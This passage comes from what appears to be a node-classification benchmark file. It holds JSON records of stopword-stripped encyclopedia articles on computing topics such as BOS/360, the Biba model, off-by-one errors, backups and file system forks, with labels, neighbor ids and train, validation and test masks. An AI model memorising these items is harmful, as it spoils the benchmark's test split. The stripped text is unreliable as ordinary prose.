    "text": "Dropbox_Carousel:dropbox carousel dropbox carousel photo video management app offered dropbox third-party native app available android ios allowed users store manage organize photos photos organized date time event backed dropbox competed space online photo storage services google google photos apple icloud yahoo flickr chris lee dropbox head product development carousel described app add-on dropbox “ dedicated experience photos videos ” space “ reliving personal memories ” mailbox founder gentry underwood unveiled carousel gathering san francisco april 9 2014 much features carousel come snapjoy photo start-up dropbox acquired december 19 2012 carousel launched marked amongst many others series acquisitions made dropbox prep opening stock public offering acquisitions would help demonstrate expansive product offerings pitching potential profitability investors december 2015 dropbox announced carousel would shut carousel features would integrated primary dropbox application march 31 2016 carousel deactivated carousel prompted users free local storage synced backed-up local photos cloud flashback feature enabled default showed past photos videos taken day year years back flashback used algorithm designed identify human faces resulting greater likelihood user picture people user close circle appearing scrollable timeline earlier scroll wheel bottom let user scroll photo specific date finger swipe",
    "neighbors": [
      236,
      7983,
      4623
    ],
    "mask": "None"
  },
  {
    "node_id": 3356,
    "label": 4,
    "text": "Maureen_Baginski:maureen baginski maureen a. baginski former signals intelligence sigint director national security agency nsa executive assistant director intelligence federal bureau investigation fbi beginning intelligence career baginski graduated ba slavic languages linguistics university albany also received honorary doctorate humane letters 2005 service nation baginski began career intelligence 1979 russian language instructor nsa cold war held various positions nearly quarter-century nsa including lead analyst soviet union assistant deputy director technology systems chief officer director executive assistant director nsa/central security service senior operations officer national security operations center sigint director nsa third highest position baginski sigint director september 11 2001 critical nsa response terrorist attacks also directing extended sigint enterprise order acquire produce disseminate foreign sigint variety government military customers documentary film “ good american ” then-senior nsa executive thomas drake quotes baginski saying “ 9/11 gift nsa ’ gon na get money need ” immediate aftermath 9/11 retired nsa analyst bill binney star film describes baginski ’ reaction “ sickening. ” 2003 baginski left position nsa become executive assistant director intelligence fbi executive assistant director intelligence fbi 2003-2005 baginski successfully led bureau first-ever intelligence program charge adapting fbi intelligence capabilities information technologies created intelligence-sharing platform helped identify stop terror plots head intelligence fbi baginski helped develop intelligence career service intelligence professionals would able advance careers fbi many high-ranking government officials including president george w. bush fbi director mueller acknowledged applauded baginski significant changes fbi improved capabilities safeguard united states america upon retirement fbi director mueller asked baginski remain senior advisor fbi position accepted since retiring fbi baginski held multiple positions within private sector board member bearingpoint inc. argon st si international inc. baginski also president national security systems sparta inc. chief executive officer national security partners llc chairwoman emeriti afcea throughout distinguished career public sector baginski received several awards including two presidential rank awards two director central intelligence national achievement medals director military intelligence ’ leadership award nsa ’ exceptional civilian service award fbi intelligence analysts association award",
    "neighbors": [
      9900
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3357,
    "label": 3,
    "text": "Compaq_Presario_3000:compaq presario 3000 compaq presario 3000 series line notebook computers produced 2000 2001 compaq noted intel processors desktop-like feature list heat heavy weight 16-inch lcd screens 3000 series sported intel chipset pentium 4 chips came variety speeds ranging 2.0 ghz 2.67 ghz however performance varied slightly models noted r3000 model appeared amd processor source model list compaq site notebook computers product range came hitachi hard disk drive teac optical media drive also came on-board altec lansing stereo speakers synaptics touchpads systems preinstalled windows xp though also designed run windows vista supplied quick restore disc returned system factory condition event change ownership wish reinstall os system failure main memory upgradeable via two 200-pin so-dimm slots using ddr pc2100 ddr pc2700 rated modules memory controller addressed maximum 1024 mb 1024 mib ram main memory also memory graphics processing unit sharing memory way reduced usable main memory reported operating system 64 mb compaq presario 3000 notebook pc series 3070us came equipped speaker placed arrow keys tends rust palm hands resting top makes laptop discolored easy repaint part new paint applied clogs holes blocks audio",
    "neighbors": [
      6765
    ],
    "mask": "None"
  },
  {
    "node_id": 3358,
    "label": 2,
    "text": "VPS/VM:vps/vm vps/vm virtual processing system/virtual machine operating system ran ibm system/370 – ibm 3090 computers boston university general use 1977 around 1990 limited use least 1993 1980s vps/vm main operating system boston university often ran 250 users time rival vm/cms computing systems could run 120 users user ran virtual machine vm ibm hypervisor operating system vm provided virtual ibm 370 machine vps operating system ran vm code modified allow vps virtual machines share pages storage read write access vps utilized shared nucleus well pages used facilitate passing data one vps virtual machine another organization similar mvs substituting address spaces virtual machines according craig estey worked boston university academic computing center 1974 1977 vps original name racs remote access computing system originally developed mcgill university montreal 1966 onward name got shortened rax running least 1973 bu probably earlier although period joint development 1972 mcgill bu started diverge mcgill rebranded version rax music/sp time music/sp wiki entry details fair amount applicable bu/rax vps development evolutionary rather revolutionary changes necessary phased time system called rax rebranded vps mostly resulting system good enough effort afoot monetize commercially music/sp remained standalone os bu ibm 370/145 ran ibm vm/370 virtual machine hypervisor rax became client os originally used one vm users rax became hypervisor aware eventually gave rax user vm parent os vm/370 invisible rax user eventually rax control resembled multicore/distributed architecture many virtual machines single shared memory copy rax client work completed renamed vps ibm-based operating system quite like dos/vse time sharing options vps/vm provided user ibm 3270 full screen terminal green screen user interface like vm/cms user 11 megabyte virtual machine strange 3 megabyte memory gap middle 1984 onwards could run several programs time operating system sparsely documented written first charles brown bu doctoral student john h. porter physics phd later became head vps project marian moore wrote much later vm code necessary run vps system josie bondoc wrote later vps additions like unix piping many mvs/vm programs ran vps/vm xedit compilers pascal pl/1 c cobol mvs/vm programs ran os simulation program simulated os/vm supervisor calls svcs margorie orr supervised os simulation program development maintenance programmers wrote parts os simulation package maintained margorie orr timothy greiser daniel levbre john coldwell lotz paul cheffers michael krugman wrote early main utilities ifmsg jcl language vps also mail early email program sendmail written francis costanzo implemented email bitnet system pre sql databases installed vps focus nomad2 michael gettes wrote early quick help system file system hierarchical originally file unique 8 character filename eventually grew onerous user given private directory tapes ibm disk files supported well native vps text files simple shell patterns supported except paw computer program written paul cheffers graphics department glenn bresnahan essentially ported unix utilities mid 1980s william marshall much early system documentation well providing pl/1 support joe dempty user services director diana robanske statistics consultant ran student assistance services 1980-1985 john houlihan also user services statistics consultant vps/vm working pre-gui ibm operating system could often run users ibm tso-based systems university-based systems provided editors compilers vps provided services 10,000 bu university community 10 years vps/vm policy operating system main utilities written ibm 370 assembler language decision restricted development system ultimately could compete unix-based systems eventually replaced however vps eventually modeled many features then-current operating systems around world keen trainer many companies needed ibm370 assembler programmers 1980s",
    "neighbors": [
      6529,
      2179,
      421,
      8524,
      7053,
      5678,
      7983,
      5463,
      5562,
      284,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 3359,
    "label": 2,
    "text": "BOS/360:bos/360 bos/360 basic operating system/360 early ibm system/360 operating system bos one four system/360 operating system versions developed ibm general products division gpd endicott new york fill gap low end system/360 line became apparent os/360 able run smallest systems bps basic programming support designed run systems minimum 8,192 bytes memory disk bos intended disk systems least 8,192 bytes one 2311 disk drive dos tos developed systems least 16,384 bytes either disks tape drives bos released october 1965 nearly two years os/360 thus bos disk based operating system available launch machine marketed disk based bos consisted following components ibm 1070 process communication supervisor dedicated process control system ran extension bos",
    "neighbors": [
      2179,
      4996,
      6148,
      10883,
      10508,
      7053,
      8077,
      9361,
      6675,
      9468,
      789,
      5397,
      9619,
      11673,
      9370,
      6557,
      10273,
      421,
      7848,
      6442,
      1323,
      7983,
      5936,
      7217,
      8879,
      9139,
      10803,
      6325,
      7477,
      7733,
      10040,
      5562,
      573,
      1219,
      964,
      8388,
      6342,
      3148,
      1235,
      7507,
      9811,
      477,
      863,
      3938,
      5603,
      868,
      3429,
      5220,
      9829,
      6248,
      5492,
      375,
      2168,
      3323,
      2172,
      2813,
      8063
    ],
    "mask": "None"
  },
  {
    "node_id": 3360,
    "label": 4,
    "text": "Biba_Model:biba model biba model biba integrity model developed kenneth j. biba 1975 formal state transition system computer security policy describes set access control rules designed ensure data integrity data subjects grouped ordered levels integrity model designed subjects may corrupt data level ranked higher subject corrupted data lower level subject general model developed address integrity core principle direct inverse bell–lapadula model general preservation data integrity three goals security model directed toward data integrity rather confidentiality characterized phrase read write contrast bell-lapadula model characterized phrase read write biba model users create content integrity level monk may write prayer book read commoners one read high priest conversely users view content integrity level monk may read book written high priest may read pamphlet written lowly commoner another analogy consider military chain command general may write orders colonel issue orders major fashion general original orders kept intact mission military protected thus read integrity conversely private never issue orders sergeant may never issue orders lieutenant also protecting integrity mission write biba model defines set security rules first two similar bell–lapadula model first two rules reverse bell–lapadula rules",
    "neighbors": [
      1225,
      4299,
      8302,
      3440,
      2737,
      4912,
      10034,
      10580,
      11184,
      8150,
      823,
      10968,
      10170,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3361,
    "label": 4,
    "text": "Brian_Snow:brian snow brian snow born september 5 1943 served u.s. national security agency 1971 2006 including six-year term technical director information assurance directorate iad defensive arm nsa charged protecting u.s. information security time research management positions nsa played key role promoting open collaborative relationship agency broader community security professionals early career snow mathematics professor ohio university helped develop college computer science department 1971 started working nsa 1970s 1980s designed cryptographic components secure systems several cryptographic systems employed u.s. government military used algorithms purposes nuclear command control tactical voice communications network security technical person high managerial responsibilities neal koblitz alfred menezes written snow strong supporter transition rsa elliptic curve cryptography ecc public key cryptographic technology cybersecurity policy expert susan landau attributes nsa harmonious collaboration industry academia selection advanced encryption standard aes 2000 — agency support choice strong encryption algorithm designed europeans rather americans — part snow represented nsa cochairman technical working group aes competition terrorist attacks 11 september 2001 nsa believed public support dramatic expansion surveillance activities according koblitz menezes period nsa trusted partner academia industry development cryptographic standards came end part change nsa post-september 11 era snow replaced technical director could longer effectively oppose proposed actions offensive arm nsa snow last years nsa retirement 2006 along clinton brooks led group drew draft ethics code intelligence officers since retiring nsa snow worked security ethics consultant member u.s. national academy sciences committee future research goals directions foundational science cybersecurity 2019 brian snow inducted national cyber security hall fame",
    "neighbors": [
      7107,
      7887
    ],
    "mask": "Train"
  },
  {
    "node_id": 3362,
    "label": 5,
    "text": "Glftpd:glftpd glftpd freely available ftp server runs unix linux bsd operating systems number features like logins restricted particular set ip addresses transfer quotas per-user per-group basis user/groups stored system files make attractive private warez servers including topsites legitimate uses though—a number web development books recommend amongst general purpose ftp servers linux certification exams sair required knowledge integrate eggdrop irc channels glftpd stands greyline file transfer protocol daemon named initial developer greyline first public release glftpd dates back beginning 1998. glftpd well known detailed user permissions extensive scripting features securely efficiently transferring files sites using fxp support glftpd available irc efnet glftpd glhelp",
    "neighbors": [
      7364,
      5612,
      2797,
      7983,
      5492,
      3030,
      823,
      5435,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3363,
    "label": 9,
    "text": "SrcML:srcml srcml source l document-oriented xml representation source code created collaborative effort michael l. collard jonathan i. maletic abbreviation srcml short source markup language srcml wraps source code text information abstract syntax tree ast tags single xml document original text preserved original source code document recreated srcml markup exception possibility newline normalization purpose srcml provide full access source code lexical documentary structural syntactic levels format also provides easy support fact-extraction transformation supported srcml toolkit maintained srcml website shown perform scalable lightweight fact-extraction transformation srcml toolkit consists command-line program called srcml translates source code srcml provided code file command line translates srcml source code srcml archive provided command line program also supports direct queries transformations srcml archives using tools like xpath xslt relaxng srcml toolkit actively maintained currently support c c++ c java srcml format consists text original source code file plus xml tags specifically text wrapped srcml elements indicate syntactic structure code short explicitly identifies syntactic structures code tags used srcml listed along category fall within srcml uses xml namespaces list prefix used denote namespace namespaces note srcml archive entire project contained within single root unit element individual file contained unit element within root unit element following shows srcml used single files following example converts c++ file main.cpp srcml file main.cpp.xml following command extract source code file main.cpp.xml place c++ file main.cpp following shows src2srcml srcml2src used entire project following example converts project 'project srcml file project.xml following command extract source code files file project.xml place directory project srcml allows use current xml apis tools write transformations also allows use xslt directly using argument—xslt= name .xls srcml2src command using srcml markup xslt allows user apply program transformations xml-like structure srcml obtain transformed xml written back source code representation using srcml2src tool application srcml program transformation explained detail collard et al following command run xslt program program.xsl srcml archive project.xml simplest form fact extraction using srcml leverages xpath order address parts srcml document pull information various entities characteristics source code course limited standard xml api may used application srcml fact extraction explained detail kagdi et al cpp directive cpp file cpp include cpp define cpp undef cpp line cpp cpp ifdef cpp ifndef cpp else cpp elif cpp endif cpp cpp pragma cpp errorliteral operator modifier example create srcml archive entire software project following command runs xpath path srcml archive project.xml work done providing convenient extension functions srcml brings lot advantages difference analysis source code one advantages ability query differences specific sections codebase well across versions codebase application srcml difference analysis explained detail maletic et al example srcml used xpath expression could used find classes source document //src class another example might finding comments within functions /src function//src comment due fact srcml based xml xml tools used srcml provides rich functionality",
    "neighbors": [
      10474,
      4980
    ],
    "mask": "Test"
  },
  {
    "node_id": 3364,
    "label": 5,
    "text": "Isochronous_media_access_controller:isochronous media access controller isochronous media access controller i-mac media access control whereby data must transferred isochronously—in words data must transmitted steady rate without interruption",
    "neighbors": [
      3847
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3365,
    "label": 7,
    "text": "Contact_Telecom:contact telecom contact telecom telecommunications services company develops data processing software services telecommunications industry established 1998 based manchester new hampshire contact telecom offers carriers service providers telecommunication companies internet service providers wireless voice ip competitive local exchange carriers incumbent local exchange carriers cable companies cloud computing providers way manage invoice usage data cost management revenue assurance customer care initiatives flagship service billing data analyzer bda automates data processing drive company overall profitability models",
    "neighbors": [
      4194
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3366,
    "label": 4,
    "text": "Backup:backup information technology backup data backup copy computer data taken stored elsewhere may used restore original data loss event verb form referring process back whereas noun adjective form backup backups used recover data loss data deletion corruption recover data earlier time backups provide simple form disaster recovery however backup systems able reconstitute computer system complex configuration computer cluster active directory server database server backup system contains least one copy data considered worth saving data storage requirements large information repository model may used provide structure storage different types data storage devices used copying backups data already secondary storage onto archive files. ref group note name=archivefilemaynotcontainold/historicalmaterial contrast everyday use term archive data stored archive file necessarily old historical interest. /ref also different ways devices arranged provide geographic dispersion data security portability data selected extracted manipulated storage process include methods dealing live data including open files well compression encryption de-duplication additional techniques apply enterprise client-server backup backup schemes may include dry runs validate reliability data backed limitations human factors involved backup scheme backup strategy requires information repository secondary storage space data aggregates backups data sources repository could simple list backup media dvds etc dates produced could include computerized index catalog relational database backup data needs stored requiring backup rotation scheme system backing data computer media limits number backups different dates retained separately appropriate re-use data storage media overwriting backups longer needed scheme determines piece removable storage used backup operation long retained backup data stored unstructured repository may simply stack tapes dvd-rs external hdds minimal information backed method easiest implement unlikely achieve high level recoverability lacks automation repository using backup method contains complete source data copies taken one specific points time copying system images method frequently used computer technicians record known good configurations however imaging generally useful way deploying standard configuration many systems rather tool making ongoing backups diverse systems incremental backup stores data changed since reference point time duplicate copies unchanged data n't copied typically full backup files infrequent intervals serving reference point incremental repository subsequently number incremental backups made successive time periods restores begin last full backup apply incrementals backup systems create series incrementals thus providing equivalent frequently full backup done modify single archive file speeds restores recent versions files true continuous data protection cdp refers backup instantly saves copy every change made data allows restoration data point time comprehensive advanced data protection near-cdp backup applications frequently marketed cdp automatically take incremental backups specific intervals example every 15 minutes one hour 24 hours therefore allow restores fixed interval near-cdp backup applications use journaling typically based periodic snapshots read-only copy data frozen particular point time near-cdp except apple time machine intent-logs every change host system often saving byte block-level differences rather file-level differences backup method differs simple disk mirroring enables roll-back log thus restoration old images data intent-logging allows precautions consistency live data protecting self-consistent files requiring applications quiesced made ready backup near-cdp practicable ordinary personal backup applications opposed cdp must run conjunction virtual machine equivalent therefore generally used enterprise client-server backups reverse incremental backup method stores recent archive file mirror source data series differences mirror current state previous states reverse incremental backup method starts non-image full backup full backup performed system periodically synchronizes full backup live copy storing data necessary reconstruct older versions either done using hard links—as apple time machine using binary diffs differential backup saves data changed since last full backup means maximum two backups repository used restore data however time last full backup thus accumulated changes data increases time perform differential backup restoring entire system requires starting recent full backup applying last differential backup differential backup copies files created changed since last full backup regardless whether differential backups made since whereas incremental backup copies files created changed since recent backup type full incremental variations incremental backup include multi-level incrementals block-level incrementals compare parts files instead entire files regardless repository model used data copied onto archive file data storage medium medium used also referred type backup destination magnetic tape long time commonly used medium bulk data storage backup archiving interchange previously less expensive option longer case smaller amounts data tape sequential access medium rate continuously writing reading data fast many tape formats proprietary specific certain markets like mainframes particular brand personal computer 2014 lto become primary tape technology remaining viable super formats ibm 3592 also referred ts11xx series oracle storagetek t10000 use hard disk storage increased time become progressively cheaper hard disks usually easy use widely available accessed quickly however hard disk backups close-tolerance mechanical devices may easily damaged tapes especially transported mid-2000s several drive manufacturers began produce portable drives employing ramp loading accelerometer technology sometimes termed shock sensor 2010 industry average drop tests drives technology showed drives remaining intact working 36-inch non-operating drop onto industrial carpeting manufacturers also offer 'ruggedized portable hard drives include shock-absorbing case around hard disk claim range higher drop specifications period years stability hard disk backups shorter tape backups external hard disks connected via local interfaces like scsi usb firewire esata via longer-distance technologies like ethernet iscsi fibre channel disk-based backup systems via virtual tape libraries otherwise support data deduplication reduce amount disk storage capacity consumed daily weekly backup data optical storage uses lasers store retrieve data recordable cds dvds blu-ray discs commonly used personal computers generally cheap past capacities speeds discs lower hard disks tapes although advances optical media slowly shrinking gap many optical disc formats worm type makes useful archival purposes since data changed optical storage systems allow cataloged data backups without human contact discs allowing longer data integrity french study 2008 indicated lifespan typically-sold cd-rs 2–10 years one manufacturer later estimated longevity cd-rs gold-sputtered layer high 100 years sony optical disc archive 2016 reach read rate 250mb/s solid-state drives ssds use integrated circuit assemblies store data flash memory thumb drives usb flash drives compactflash smartmedia memory sticks secure digital card devices relatively expensive low capacity convenient backing relatively low data volumes solid-state drive contain movable parts making less susceptible physical damage huge throughput around 500 mbit/s 6 gbit/s available ssds become capacious cheaper flash memory backups stable fewer years hard disk backups remote backup services cloud backups involve service providers storing data offsite used protect events fires floods earthquakes could destroy locally stored backups cloud-based backup provides layer data protection however users must trust provider maintain privacy integrity data confidentiality enhanced use encryption speed availability limited user online connection users large amounts data may need use cloud seeding large-scale recovery various methods used manage backup media striking balance accessibility security cost media management methods mutually exclusive frequently combined meet user needs using on-line disks staging data sent near-line tape library common example online backup storage typically accessible type data storage begin restore milliseconds internal hard disk disk array maybe connected san example online backup type storage convenient speedy vulnerable deleted overwritten either accident malevolent action wake data-deleting virus payload nearline storage typically less accessible less expensive online storage still useful backup data storage mechanical device usually used move media units storage drive data read written generally safety properties similar on-line storage example tape library restore times ranging seconds minutes off-line storage requires direct action provide access storage media example inserting tape tape drive plugging cable data accessible via computer except limited periods written read back largely immune on-line backup failure modes access time varies depending whether media on-site off-site backup media may sent off-site vault protect disaster site-specific problem vault simple system administrator home office sophisticated disaster-hardened temperature-controlled high-security bunker facilities backup media storage data replica off-site also on-line e.g. off-site raid mirror replica fairly limited value backup backup site disaster recovery center used store data enable computer systems networks restored properly configure event disaster organisations heir data recovery centres others contract third-party due high costs backing rarely considered preferred method moving data dr site typical way would remote disk mirroring keeps dr data date possible backup operation starts selecting extracting coherent units data data modern computer systems stored discrete units known files files organized filesystems deciding back given time involves tradeoffs backing much redundant data information repository fill quickly backing insufficient amount data eventually lead loss critical information files actively updated called live present challenge back effective way back live data temporarily quiesce e.g. close files take snapshot resume live operations point snapshot backed normal methods snapshot instantaneous function filesystems presents copy filesystem frozen specific point time often copy-on-write mechanism snapshotting file changed results corrupted file unusable also case across interrelated files may found conventional database applications microsoft exchange server term fuzzy backup used describe backup live data looks like ran correctly represent state data single point time backup options data files quiesced include information stored computer stored files accurately recovering complete system scratch requires keeping track non-file data frequently useful required manipulate data backed optimize backup process manipulations improve backup speed restore speed data security media usage and/or reduced bandwidth requirements out-of-date data automatically deleted personal backup applications—as opposed enterprise client-server backup applications automated data grooming customized—the deletion globally delayed disabled various schemes employed shrink size source data stored uses less storage space compression frequently built-in feature tape drive hardware redundancy due backing similarly configured workstations reduced thus storing one copy technique applied file raw block level potentially large reduction called deduplication occur server data moves backup media sometimes referred source/client side deduplication approach also reduces bandwidth required send backup data target media process also occur target storage device sometimes referred inline back-end deduplication sometimes backups duplicated second set storage media done rearrange archive files optimize restore speed second copy different location different storage medium—as disk-to-disk-to-tape capability enterprise client-server backup high-capacity removable storage media backup tapes present data security risk lost stolen encrypting data media mitigate problem however encryption cpu intensive process slow backup speeds security encrypted backups effective security key management policy many computers backed destination storage devices ability use single storage device several simultaneous backups useful however cramming scheduled backup window via multiplexed backup used tape destinations process rearranging backup sets archive file known refactoring example backup system uses single tape day store incremental backups protected computers restoring one computers could require many tapes refactoring could used consolidate backups single computer onto single tape creating synthetic full backup especially useful backup systems incrementals forever style backups sometimes backups copied staging disk copied tape process sometimes referred d2d2t acronym disk disk tape useful problem matching speed final destination device source device frequently faced network-based backup systems also serve centralized location applying data manipulation techniques",
    "neighbors": [
      5120,
      2051,
      6149,
      7685,
      1551,
      7189,
      535,
      1560,
      1049,
      4637,
      9762,
      7715,
      6692,
      10276,
      5158,
      3629,
      2095,
      8239,
      1594,
      7739,
      8254,
      10302,
      7238,
      9286,
      4170,
      9802,
      7761,
      3676,
      5728,
      2658,
      9314,
      11366,
      3692,
      9332,
      9335,
      7804,
      10876,
      9343,
      7297,
      6786,
      4229,
      652,
      6797,
      3214,
      6286,
      6799,
      2196,
      2199,
      10392,
      6297,
      9375,
      5287,
      10921,
      8875,
      8878,
      5300,
      7863,
      8376,
      6331,
      3773,
      8897,
      7874,
      708,
      5327,
      6351,
      8402,
      3800,
      5848,
      6361,
      7905,
      9953,
      10977,
      11492,
      3813,
      2280,
      7417,
      4348,
      5373,
      1280,
      8451,
      1801,
      7433,
      7434,
      9484,
      10505,
      11017,
      1814,
      3350,
      6424,
      8471,
      10518,
      10522,
      11543,
      1314,
      3366,
      3880,
      1324,
      1844,
      11065,
      9530,
      11581,
      9025,
      10561,
      11073,
      3913,
      1358,
      6991,
      11598,
      4435,
      2901,
      1885,
      3428,
      5482,
      9585,
      6514,
      5491,
      1908,
      6003,
      8052,
      11633,
      4987,
      2940,
      2432,
      5504,
      6019,
      1412,
      10120,
      1417,
      4490,
      5004,
      11667,
      11157,
      9112,
      2970,
      11166,
      6565,
      11178,
      9643,
      11691,
      9134,
      11695,
      1970,
      2487,
      10681,
      956,
      11198,
      8640,
      1990,
      6089,
      2515,
      10711,
      5085,
      4574,
      1509,
      2534,
      491,
      1515,
      3053,
      9202,
      11256,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3367,
    "label": 4,
    "text": "Off-by-one_error:off-by-one error off-by-one error oboe also commonly known obob off-by-one bug ob1 error logic error involving discrete equivalent boundary condition often occurs computer programming iterative loop iterates one time many problem could arise programmer makes mistakes using less equal less used comparison fails take account sequence starts zero rather one array indices many languages also occur mathematical context consider array items items n inclusive processed many items intuitive answer may n − one exhibiting fencepost error correct answer n – 1 reason ranges computing often represented half-open intervals range n inclusive represented range inclusive n 1 exclusive avoid fencepost errors example loop iterates five times 0 4 inclusive written half-open interval 0 5 loop body executed first index equal 0 becomes 1 2 3 finally 4 successive iterations point index becomes 5 index 5 false loop ends however comparison used less equal loop would carried six times index takes values 0 1 2 3 4 5 likewise index initialized 1 rather 0 would four iterations index takes values 1 2 3 4 alternatives cause off-by-one errors another error occur do-while loop used place loop vice versa do-while loop guaranteed run least array-related confusion may also result differences programming languages numbering 0 common languages start array numbering 1 pascal arrays user-defined indices makes possible model array indices problem domain fencepost error occasionally called telegraph pole lamp-post picket fence error specific type off-by-one error early description error appears works vitruvius following problem illustrates error naive answer 10 wrong fence 10 sections 11 posts reverse error occurs number posts known number sections assumed actual number sections one less number posts generally problem stated follows correct answer may line posts open-ended n form loop posts occur end fence instance fence runs two walls precise problem definition must carefully considered setup one situation may give wrong answer situations fencepost errors come counting things rather spaces vice versa neglecting consider whether one count one ends row fencepost errors also occur units length example time pyramid consisting 120 blocks placed 10-year intervals blocks scheduled take 1,190 years build 1,200 installation first block last block one earliest fencepost errors involved time julian calendar originally calculated leap years incorrectly due counting inclusively rather exclusively yielding leap year every three years rather every four fencepost error rare occasions refer error induced unexpected regularities input values instance completely thwart theoretically efficient binary tree hash function implementation error involves difference expected worst case behaviours algorithm larger numbers one often major issue smaller numbers however specific cases accuracy paramount committing off-by-one error disastrous sometimes issue also repeated therefore worsened someone passing incorrect calculation following person makes kind mistake course error might also reversed example error occur computational language matlab codice_1 linear interpolation function whose parameters codice_2 codice_3 programmer misunderstands third parameter number increments might hope codice_4 would achieve sequence instead would get common off-by-one error results security-related bug caused misuse c standard library codice_5 routine common misconception codice_5 guaranteed null termination write beyond maximum length reality write terminating null character one byte beyond maximum length specified following code contains bug off-by-one errors common using c library consistent respect whether one needs subtract 1 byte – functions like codice_7 codice_8 never write past length given codice_7 subtracts 1 retrieves length − 1 bytes whereas others like codice_5 write past length given programmer remember functions need subtract 1 systems little endian architectures particular result overwriting least significant byte frame pointer cause exploitable condition attacker hijack local variables calling routine one approach often helps avoid problems use variants functions calculate much write based total length buffer rather maximum number characters write functions include codice_11 codice_12 often considered safer make easier avoid accidentally writing past end buffer code example calling codice_13 instead would remove bug",
    "neighbors": [
      9700,
      6568,
      428,
      8524,
      815,
      4823,
      155,
      7292,
      2717,
      7326
    ],
    "mask": "None"
  },
  {
    "node_id": 3368,
    "label": 6,
    "text": "Fork_(file_system):fork file system computer file system fork set data associated file-system object file systems without forks allow single set data contents file systems forks allow multiple contents every non-empty file must least one fork often default type depending file system file may one associated forks turn may contain primary data integral file metadata unlike extended attributes similar file system feature typically fixed size forks variable size possibly even larger file primary data fork size file sum sizes fork file systems without forks one may instead use multiple separate files associated particularly sidecar files metadata however connection files automatically preserved file system must instead handled program works files another alternative container file stores additional data within given file format archive file allows storing several files metadata within file within single fork requires programs process container file archive file rather file system handling forks alternatives require additional work programs using data benefit portability file systems support forks file system forks associated apple hierarchical file system hfs apple hfs original apple macintosh file system mfs allowed file system object two kinds forks data fork resource fork resource fork designed store non-compiled data would used system graphical user interface gui localizable text strings file icon used finder menus dialog boxes associated application however feature flexible additional uses found splitting word processing document content presentation storing part separate resources compiled software code also stored resource often applications would consist resource fork data fork one hfs+ obscure features file may arbitrary number custom named forks addition traditional data resource forks feature gone largely unused apple never added support mac os 8.1-10.3.9 beginning 10.4 partial implementation made support apple extended inline attributes mac os x v10.4 users running unix command line utilities tar included mac os x would risk data loss utilities updated handle resource forks files v10.4 starting 1985 novell netware file system nwfs successor novell storage services nss designed ground use variety methods store file metadata metadata resides novell directory services nds stored directory structure disk stored novell terms 'multiple data streams file multiple data streams also allow macintosh clients attach use netware servers ntfs file system introduced windows nt 3.1 supports file system forks known alternate data streams ads refs new file system introduced windows server 2012 originally support ads windows 8.1 64-bit server 2012 r2 support ads lengths 128k added refs ads originally intended add compatibility existing operating systems support forks computer program may directed open ads specifying name ads colon sign file path spite support programs including windows explorer dir command windows vista ignore ads windows explorer copies ads warns target file system support calculates main stream size list file folder streams dir command windows vista supports showing ads windows powershell v3.0 later supports manipulating ads windows 2000 uses ads store thumbnails image files store summary information title author file without changing main stream windows xp microsoft realized ads susceptible loss files containing moved ntfs volumes thus windows xp stores main stream whenever file format supports windows vista discontinued support adding summary information altogether microsoft decided sensitive ads handle use ads purposes stop service pack 2 windows xp introduced attachment execution service stores details origin downloaded files ads called zone identifier effort protect users downloaded files may present risk internet explorer windows 8 extended function smartscreen internet explorer also uses ads store favicons internet shortcut files solaris version 9 later allows files forks forks called extended attributes solaris although within usual meaning extended attribute maximum size solaris-type extended attribute maximum size file read written fashion files internally actually stored accessed like normal files ownership permissions differ parent file sub-directories administratively disabled names contain characters extended attributes network file system version 4 similar solaris-style extended attributes file system supports different forks applications aware security risks arise allowing legacy software access data without appropriate shims place primary culprit problems different system utilities disk explorer antivirus software archivers aware different forks following problems arise",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      2095,
      7225,
      7739,
      11323,
      576,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      639,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      9388,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      5492,
      11638,
      6519,
      376,
      11128,
      890,
      2432,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 3369,
    "label": 2,
    "text": "Linuxcare:linuxcare linuxcare founded san francisco 1998 dave sifry arthur tyde dave laduke company initial goal 800 number linux operate 24 hours day due dot-com bubble early millennium years version linuxcare morphed levanta eventually closed doors 2008 1999 linuxcare developed linuxcare bootable toolbox also known linuxcare bbc bootable business card bbc live cd bootable linux distribution designed run entirely cd 1999 new concept preceded one linux distribution designed exclusively run cd demolinux demolinux designed show whole desktop experience linux distribution linuxcare bbc designed used mainly utility cd first live cd focus bbc distribution 50mb designed fit mini cd shaped like standard business card included utilities designed assist system administrators primarily text console operating system minimal blackbox x11 ui included linuxcare produced initial launch unversioned release pressed business card cds distributed linuxworld 1999 versions 1.2 1.5 1.6 later released online pressed released conventions linux user groups 1999 2001 may 8 2001 seth schoen announced original three developers linuxcare bootable toolbox left linuxcare fork project new community project named lnx-bbc release 1.6 released may 2001 served transition release linuxcare lnx-bbc projects offering release respective sites lnx-bbc produced three bbc releases 1.618 august 2001 2.0 january 2003 2.1 may 1 2003 early versions assembled hand later versions utilized gar software build system built around gnu automake lnx-bbc discontinued 2.1 release linuxcare brand repurchased arthur tyde incorporated llc dr. scott s. elliott partners state california new company provides services businesses related cloud computing linuxcare llc offices san 